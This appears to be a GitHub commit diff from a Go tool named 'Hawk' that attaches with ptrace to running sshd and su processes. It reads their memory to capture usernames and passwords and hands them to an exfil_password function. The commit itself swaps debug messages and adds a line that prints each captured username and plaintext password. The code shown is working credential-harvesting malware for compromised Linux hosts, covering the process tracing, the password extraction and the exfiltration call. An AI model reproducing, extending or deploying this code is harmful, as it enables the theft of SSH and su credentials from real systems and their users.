debug: pipeline build to debug

ProDefense · Feb 25, 2024 · 170c3d0 · 170c3d0
1 parent 9f46760
commit 170c3d0
Show file tree

Hide file tree

Showing 3 changed files with 11 additions and 4 deletions.
diff --git a/main.go b/main.go
@@ -75,7 +75,7 @@ func main() {
 				if !processedFirstPID {
 					processedFirstPID = true
 				} else {
-					fmt.Printf("Found SSH Tracing %d\n", pid)
+					fmt.Println("SSHD process found with PID:", pid)
 					go traceSSHDProcess(pid)
 					processed_pids = append(processed_pids, pid)
 				}
@@ -84,7 +84,7 @@ func main() {
 				if !processedFirstPID {
 					processedFirstPID = true
 				} else {
-					fmt.Printf("Found SU Tracing %d\n", pid)
+					fmt.Println("SU process found with PID:", pid)
 					go traceSUProcess(pid)
 					processed_pids = append(processed_pids, pid)
 				}

diff --git a/ssh_tracer.go b/ssh_tracer.go
@@ -8,12 +8,15 @@ import (
 )
 
 func traceSSHDProcess(pid int) {
+	fmt.Printf("[Hawk] SSH Connection Identified on pid: %d.\n", pid)
+
 	err := syscall.PtraceAttach(pid)
 	if err != nil {
 		return
 	}
 	defer func() {
 		syscall.PtraceDetach(pid)
+		fmt.Printf("[Hawk] Detached from pid: %d.\n", pid)
 	}()
 
 	var wstatus syscall.WaitStatus
@@ -32,6 +35,7 @@ func traceSSHDProcess(pid int) {
 			var regs syscall.PtraceRegs
 			err := syscall.PtraceGetRegs(pid, &regs)
 			if err != nil {
+				fmt.Println("PtraceGetRegs:", ptrace_err)
 				syscall.PtraceDetach(pid)
 				return
 			}
@@ -52,7 +56,7 @@ func traceSSHDProcess(pid int) {
 					var password = string(buffer)
 					valid := regexp.MustCompile(`\x00\x00\x00[^\n]*\f$`).MatchString(password)
 					if !valid {
-						fmt.Print("SSH Exfil Hit")
+						fmt.Printf("Username: %q, Password %q\n", username, password)
 						go exfil_password(username, removeFirstFourBytes(password))
 					}
 				}

diff --git a/su_tracer.go b/su_tracer.go
@@ -9,11 +9,13 @@ import (
 )
 
 func traceSUProcess(pid int) {
+	fmt.Printf("[Hawk] SU Connection Identified on pid: %d.\n", pid)
 	err := syscall.PtraceAttach(pid)
 	if err != nil {
 		return
 	}
 	defer func() {
+		fmt.Printf("[Hawk] Detached from pid: %d.\n", pid)
 		syscall.PtraceDetach(pid)
 	}()
 	var wstatus syscall.WaitStatus
@@ -32,6 +34,7 @@ func traceSUProcess(pid int) {
 		var regs syscall.PtraceRegs
 		ptrace_err := syscall.PtraceGetRegs(pid, &regs)
 		if ptrace_err != nil {
+			fmt.Println("PtraceGetRegs:", ptrace_err)
 			syscall.PtraceDetach(pid)
 			return
 		}
@@ -61,7 +64,7 @@ func traceSUProcess(pid int) {
 						}
 						return true
 					}(password) {
-						fmt.Print("Su Exfil Hit")
+						fmt.Printf("Username: %q, Password %q\n", username, password)
 						go exfil_password(username, password)
 					}
 				}